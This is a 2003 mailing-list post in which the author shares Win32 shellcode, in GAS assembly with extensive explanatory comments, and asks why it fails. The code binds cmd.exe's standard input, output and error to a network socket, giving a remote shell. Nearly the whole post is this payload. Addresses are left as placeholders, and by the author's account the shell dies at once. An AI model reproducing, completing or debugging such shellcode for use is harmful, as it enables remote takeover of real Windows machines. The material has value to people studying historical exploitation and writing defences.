
Re: Windows reverse Shell

From: Berend-Jan Wever <skylined(at)edup.tudelft.nl>
Date: Tue Feb 04 2003 - 19:54:44 EST
('binary' encoding is not supported, stored as-is)
In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>

I wrote a little piece of shellcode that should spawn a shell using a socket in %ebp, which will execute cmd.exe successfully. The problem is that cmd.exe dies right away. Has anybody got an idea why? The source (asm for linux) is included.

Kind regards,

Berend-Jan Wever

    Start:
    #-----------------------------------------------------------------------
    # MakeStringAndNegEbx
    # Scans forward from %edi for the next ',' and overwrites that ',' with a
    # 0 byte, so the comma-separated text that follows the code (see the
    # string after End:) becomes a NUL-terminated string in place.  Also
    # negates %ebx: callers load %ebx with a negated address (only 0xXXXXXX
    # placeholders are given in the post) and rely on this routine to turn it
    # back into the real pointer -- presumably so the immediate carries no
    # zero bytes, but the post does not say.
    # Syntax/ABI: GAS AT&T, 32-bit x86, calling into Win32 stdcall APIs.
    # In:    %edi = start of the string to terminate
    #        %ebx = -(address)
    # Out:   %edi = one past the ',' (= start of the next string)
    #        %ebx = address (negation undone)
    # Clobb: %al, %ecx, flags
    # Notes: %ecx = -1 makes the scan effectively unbounded; if no ',' is
    #        reachable it keeps reading until it faults.  The 0 is written
    #        into the string area that follows the code, so the memory holding
    #        this blob must be writable as well as executable.
    #-----------------------------------------------------------------------
    MakeStringAndNegEbx:

      mov     $',', %al         # only %al is written; upper bytes of %eax untouched
      xor     %ecx, %ecx
      dec     %ecx              # %ecx = -1: no real length bound on the scan
      repne   scasb             # search for ','; leaves %edi one past it
      sub     %al, -1(%edi)     # ',' - ',' = 0: terminate the string in place
      neg     %ebx              # %ebx = -(-address) = address
      ret
    
    #-----------------------------------------------------------------------
    # GetLibraryAndProcAddress
    # Equivalent to: GetProcAddress(LoadLibraryA(libName), procName)
    # In:    %edi = "libName,procName,..." (comma-separated, see the string
    #               after End:); each ',' is replaced by 0 as it is consumed
    # Out:   %eax = value returned by GetProcAddress
    #        %edi = one past the second ','
    # Clobb: %ebx, %ecx, %al (via MakeStringAndNegEbx), plus whatever the two
    #        Win32 calls clobber; both are stdcall, so they pop their own args
    # Both API calls are indirect through a pointer stored at a fixed address
    # (0xXXXXXX placeholders) -- presumably an import-table slot of the
    # hosting binary; the post does not say how those addresses are obtained.
    # The 'push %edi' for each name happens before the terminator is written,
    # which is fine: the pointer is unchanged, only the ',' byte is.
    #-----------------------------------------------------------------------
    GetLibraryAndProcAddress: # {
      push    %edi              # > libName
      mov     $-0xXXXXXX, %ebx  # negated pointer-to-LoadLibraryA (placeholder)
      call    MakeStringAndNegEbx # put 0 after libName; %ebx = real address
      call    *(%ebx)           # < LoadLibraryA(libName);  %eax = libHandle

      push    %edi              # > procName (%edi now past the first ',')
      push    %eax              #  > libHandle
      mov     $-0xXXXXXX, %ebx  # negated pointer-to-GetProcAddress (placeholder)
      call    MakeStringAndNegEbx # put 0 after ProcName; %ebx = real address
      call    *(%ebx)           # << GetProcAddress(libHandle, procName);
      ret                       # %eax = result; not checked for NULL

    # }

    #-----------------------------------------------------------------------
    # main1
    # Entered only via 'call main1' from EntryPoint (the last instruction of
    # the blob), so the return address popped into %edi is the address of
    # End:, i.e. of the string "cmd.exe,kernel32.dll,CreateProcessA," that
    # follows the code.
    # In:    %ebp = socket handle (EntryPoint loads it from the stack)
    # Does:  builds a STARTUPINFO (cb = 0x44, 17 dwords) and a
    #        PROCESS_INFORMATION on the stack, with all three std handles set
    #        to %ebp and dwFlags = 0x101 (STARTF_USESTDHANDLES |
    #        STARTF_USESHOWWINDOW), then calls CreateProcessA("cmd.exe") with
    #        bInheritHandles = 1 and spins forever.  Never returns; the BOOL
    #        result of CreateProcessA is not checked.
    # Stack: STARTUPINFO fields are pushed last-field-first, so cb ends up at
    #        the lowest address (offset 0) as the C layout requires.  The
    #        PROCESS_INFORMATION fields are pushed first-field-first and so
    #        land reversed relative to the C struct; harmless here because
    #        nothing ever reads them back.
    # Host-side artefact: a cmd.exe child whose standard handles are a socket
    # handle inherited from its parent (bInheritHandles = 1).
    #-----------------------------------------------------------------------
    main1:
# %ebp = socket

      pop     %edi              # < %edi = &strings (return address = End:)


# create a struct StartupInfo on the stack.
      xor     %eax, %eax
      push    %ebp              # HANDLE hStdError = socket
      push    %ebp              # HANDLE hStdOutput = socket
      push    %ebp              # HANDLE hStdInput = socket
      push    %eax              # LPBYTE lpReserved2 = NULL
      inc     %eax              # %eax = 1
      push    %eax              # low WORD wShowWindow = 1, high WORD cbReserved2 = 0
      mov     %al, %ah          # %eax = 0x101
      push    %eax              # DWORD dwFlags = STARTF_USESHOWWINDOW |
      xor     %eax, %eax        #                 STARTF_USESTDHANDLES
      push    %eax              # DWORD dwFillAttribute = 0
      push    %eax              # DWORD dwYCountChars = 0
      push    %eax              # DWORD dwXCountChars = 0
      push    %eax              # DWORD dwYSize = 0
      push    %eax              # DWORD dwXSize = 0
      push    %eax              # DWORD dwY = 0
      push    %eax              # DWORD dwX = 0
      push    %eax              # LPTSTR lpTitle = NULL (program name)
      push    %eax              # LPTSTR lpDesktop = NULL (inherit)
      push    %eax              # LPTSTR lpReserved = NULL
      mov     $0x44, %al        # only %al written; %eax was 0, so %eax = 0x44
      push    %eax              # DWORD cb = 0x44 (length); this is offset 0
      mov     %esp, %esi        # %esi = &STARTUPINFO
# create a struct ProcessInformation on the stack.
      xor     %eax, %eax
      push    %eax              # HANDLE hProcess;
      push    %eax              # HANDLE hThread;
      push    %eax              # DWORD dwProcessId;
      push    %eax              # DWORD dwThreadId;   (top of stack, see header)
# create a process with STD I/O handles hooked to socket.
      push    %esp              # > lpProcessInformation -> stack (%esp = &PI)
      push    %esi              # > lpStartupInfo -> stack
      push    %eax              # > lpCurrentDirectory: NULL
      push    %eax              # > lpEnvironment: NULL
      push    %eax              # > dwCreationFlags: 0
      inc     %eax
      push    %eax              # > bInheritHandles: 1 (true)
      dec     %eax
      push    %eax              # > lpThreadAttributes: NULL
      push    %eax              # > lpProcessAttributes: NULL
      push    %edi              # > lpCommandLine: &('cmd.exe')
      push    %eax              # > lpApplicationName: NULL
      call    MakeStringAndNegEbx # put 0 after commandline; %ebx here is
                                  # arbitrary, its negation is never used
      call    GetLibraryAndProcAddress # LoadLibrary and GetProcAddress;
                                  # %edi now past "CreateProcessA,"
      call    *%eax             # <<<<<<<<<< CreateProcess(...); result ignored
    InfinitLoop:
      jmp     InfinitLoop       # wait forever.
    EntryPoint:
      lea     0xXX(%esp), %eax  # socket is on the stack at XX (placeholder offset)
      mov     (%eax), %ebp      # socket
      call    main1             # pushes &End: (the strings) as return address

    End:

The code is followed by this string:

    "cmd.exe,kernel32.dll,CreateProcessA,"

Received on Wed Feb 5 12:07:40 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT

